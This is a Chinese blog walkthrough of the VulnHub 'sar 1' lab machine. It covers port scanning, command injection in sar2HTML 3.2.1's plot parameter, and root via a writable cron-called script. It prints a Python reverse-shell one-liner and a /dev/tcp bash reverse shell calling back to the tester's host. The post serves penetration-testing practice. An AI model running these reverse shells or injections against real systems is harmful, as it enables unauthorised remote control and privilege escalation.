【学渗透靶机——sar 1】

已于 2023-06-21 13:53:31 修改
阅读量545 收藏
点赞数
分类专栏: web渗透 靶机学习 文章标签: web安全 安全 网络
于 2023-06-20 14:07:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jieli0901227/article/details/131271829
版权

sar1

信息收集

主机信息收集

主机ip

nmap -sn  192.168.241.0/24

在这里插入图片描述

主机端口开放

nmap --min-rate 10000 -p- 192.168.241.170

在这里插入图片描述

主机端口服务详情

nmap -sT -sV -sC -O -p80  192.168.241.170

在这里插入图片描述
在这里插入图片描述
主机漏洞扫描完成,这台靶机只开放了80 端口,通过nmap l漏洞扫描发现有robots.txt 和phpinfo.php 两个文件

web 信息收集

80 端口

80 端口默认页是一个apache服务的默认页面,没有什么特殊的地方
在这里插入图片描述
查看robots.txt文件 打开后是个字符串 sar2HTML

在这里插入图片描述
robots 这个文件是方式爬虫爬取网站的,那么这个字符串有可能就是路径了,访问看看,
在这里插入图片描述
sar2html 软件是生成报告的,版本为3.2.1

漏洞利用

searchsploit 搜索一下有没有这个漏洞的exp
在这里插入图片描述

那就好办了,,尝试利用下,镜像下来,打开看看

在这里插入图片描述
index.php 的参数plot 值使用分号隔开后加上系统命令造成远程命令执行
我们尝试一下
在这里插入图片描述
执行成功。。。

获取系统初始立足点

那我们直接写入反弹shell 就好了。。

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.241.131",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

靶机监听 ,
在这里插入图片描述

提权

查看当前用户以root 权限执行命令

sudo -l 执行后需要密码,暂时放弃

查看计划任务

在这里插入图片描述
切换到目录、var/www/html下 查看finally.sh ,这个脚本调用了write.sh ,
在这里插入图片描述
write.sh 这个脚本对当前用户有读写权限,

echo '#!/bin/sh' > write.sh
echo 'bash -c "bash -i >& /dev/tcp/192.168.241.131/4444 0>&1"' >>write.sh

在这里插入图片描述

静等5分钟 ,收到靶机连上反弹shell,确认用户为root
在这里插入图片描述

总结:
1、首先靶机主机ip发现, 端口扫描(),nmap 漏洞探测。

  • 扫描出主机192.168.241.170 只开放端口80
  • nmap 漏洞探测枚举出 robots.txt和phpinfo.php两个文件

2、web渗透

  • 打开网站发现是apache测试页,都收静态页面,没有什么有效信息,
  • 访问robots.txt 有个字符串sar2html,robots.txt 是防止爬虫爬取网的一些路径, 尝试路径访问,页面显示,
  • sar2html 软件是生成报告的,版本为3.2.1
  • searchsploit 搜索sar2htm 3.2 可利用的exp ,搜素结果是有个远程代码执行的exp,
  • 分析exp代码 是plot=NEW 值后添加分号能够执行系统命令,测试成功
  • 写入反弹shell 获取系统初始立足点
    3、提权:
  • 查看计划任务有个执行脚本finally.sh,分析这个脚本看见这个脚本调用了write.sh脚本,
    -write.sh 有写权限 ,在write.sh写入反弹shell ;
    4、 提权分析:
  • finally.sh 这个脚本是以root执行,执行过程调write.sh;
  • 在write.sh写入反弹shell,finally.sh执行write.sh 的反弹shell脚本后就能获取root 环境的shell
懒惰的老鼠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
9.100个渗透测试实战#9(DC-4)
01-09
世间一切皆可努力                                                                                                                                                                                     感谢浏览 目录   一、实验环境 二、实验流程 三、实验步骤 (一)信息收集——主机发现阶段 1.查看kali的网卡、IP等信息;(网卡名:eth0,IP地址:192.168.97.129) 2.查看靶机页面; 3.探测特
靶机渗透sar
最新发布
weixin_64267091的博客
02-28 1083
靶机渗透过程也就分为那几步骤,首先就是信息收集,找ip,端口,目录,漏洞。然后就进行漏洞分析,在进行漏洞分析的时候使用到了kali中自带的工具searchsploit,使用它搜索sar2HTML存在的漏洞,然后将漏洞利用脚本拷贝到本地,最后得知漏洞利用方式。最后就利用远程代码执行漏洞,上传反弹shell脚本,上传脚本一直出问题,也不知道为啥,最后上传了个shell.py,反弹成功。然后就是最后提权部分,利用了计划任务提权,获取root权限的关键是finally.sh脚本以root用户的权限来执行。
实战打靶集锦-012-sar2HTML
阿尔泰野狼的博客
03-19 487
本文记录博主的一次打靶经历。
vulnhub Sar: 1
箭雨镜屋
05-04 1234
渗透思路:nmap扫描----dirb扫描网站目录----exploit-db查找exp----利用sar2html的RCE漏洞getshell(base64编码)----利用定时任务提权
实战项目之AIWEB2靶场渗透
胖虎的博客
11-05 1332
AIweb2靶场渗透测试
Web渗透漏洞靶场收集
m0_61869253的博客
03-23 667
如果你想搞懂一个漏洞,比较好的方法是:你可以自己先用代码编写出这个漏洞,然后再利用它,最后再修复它”。—-摘自pikachu漏洞靶场的一句话。初的时候玩靶场会很有意思,可以练习各种思路和技巧,用来检测扫描器的效果也是很好的选择。今天,我们来数数那些入门Web安全必不可错过的靶场。AWVS的测试站点,用于扫描效果验证,提供了多场景的公网靶场,也常作为漏洞利用演示的目标。Web安全入门必刷的靶场,包含了最常见的web漏洞,界面简单易用,通过设置不同的难度,可更好地理解漏洞的原理及对应的代码防护。
vulnhub sar 靶场练习
鸥鹭忘机
09-07 2085
前言 这次练习的靶机是vulnhub平台下的sar,该靶机是一个类似oscp的虚拟机,目的是提高并巩固渗透测试的知识点。下载地址为https://www.vulnhub.com/entry/sar-1,425/。这个靶机中没有出现新的知识点,难度相对比较简单。如果看过我前面vulnhub DC系列的文章,那么这次靶机可以独立自主完成。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击sar靶机,然后选中配置。依次点击网络配置->NAT模式->高
vulhub渗透测试靶机习1
08-08
渗透测试靶机习】 渗透测试靶机安全研究人员和网络安全爱好者用来提升技能和实践渗透测试技巧的模拟环境。在本文中,我们将讨论两个靶机环境:Lampiao 和 Kioptrix Level 1.2 (#3),以及如何对它们进行初步的...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
sar2html-开源
05-25
Sar2html是基于Web的性能监视前端。 它将sar二进制数据转换为图形格式,并将历史数据保留在其数据库中。 项目主页在这里:https://github.com/cemtan/sar2html.git支持的操作系统:HPUX 11.11、11.23、11.31 Solaris 5.9、5.10、5.11 Redhat 3、4、5、6、7 Suse 8、9 ,10,11,12 Ubuntu 18,20如果您的客户在上述操作系统上遇到性能问题,则可以发送sar2ascii来收集性能数据。 然后,您可以绘制性能图形,并通过sar2html以pdf文件格式生成性能报告。 请记住,捐赠鼓励开发人员实施更多。
渗透测试入门——渗透测试笔记
01-27
CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并插入木马,再用中国菜刀连接,继而找到在管理员桌面上的 flag文件;第3题...
OWASP靶机安全习、测试
05-24
在信息安全中OWASP TOP 10 是渗透测试人员都会涉及到的一个项目,意思是10项最严重的Web 应用程序安全风险列表,该列表总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞。这里包括: A1—注入 A2—失效的...
Kali web渗透测试
cnm1131627的博客
11-08 424
形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。所信息安全技术中也知道XSS攻击所带来的危害很大,所以大家注意防范禁止做违反法律的事。7.从Web存储中提取信息从Web存储中提取信息指的是从浏览器的本地存储(例如cookies、localStorage或sessionStorage)中获取敏感信息或凭据的过程。攻击者可以通过各种手段来获取这些信息,包括利用XSS漏洞、利用恶意软件、进行社交工程等。
渗透靶机——prime】
jieli0901227的博客
05-13 253
提示使用secrettier360作为参数在每一个php 页面,有参数没有值,那我们就在index.php 和image.php 上测试文件包含漏洞。这台靶机开放端口 22 80 端口 使用nmap 扫描只有枚举的信息, 22 端口也没有账密信息 ,所以重点放在80端口上。接下来直接拿webshell,打开我们最喜欢的主题编辑器,翻了半天,只有secret.php 存在写权限,写入反弹shell。页面提示我挖错文件了,,那就尝试读取location.txt.,如下图。查看enc 文件 无读权限。
VulnHub AI-Web 1.0 靶机渗透
weixin_45908624的博客
12-29 1019
vulnhub ai-web1.0
sar1靶机练习
SYJ_361的博客
04-01 4848
本文通过kali渗透sar1靶机获得root权限,利用kali找到对应的模块,查看漏洞信息,构造payload下载文件,用蚁剑反弹shell,最终获得root权限
OSCP靶机练习--Sar 01
一杯咖啡的渗透记忆
09-22 793
OSCP靶机练习--Sar 01 靶机下载地址: https://download.vulnhub.com/sar/sar.zip 靶机环境搭建: VMwarep配置NAT方式
vulnhub靶机——raven: 2
09-03
- *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值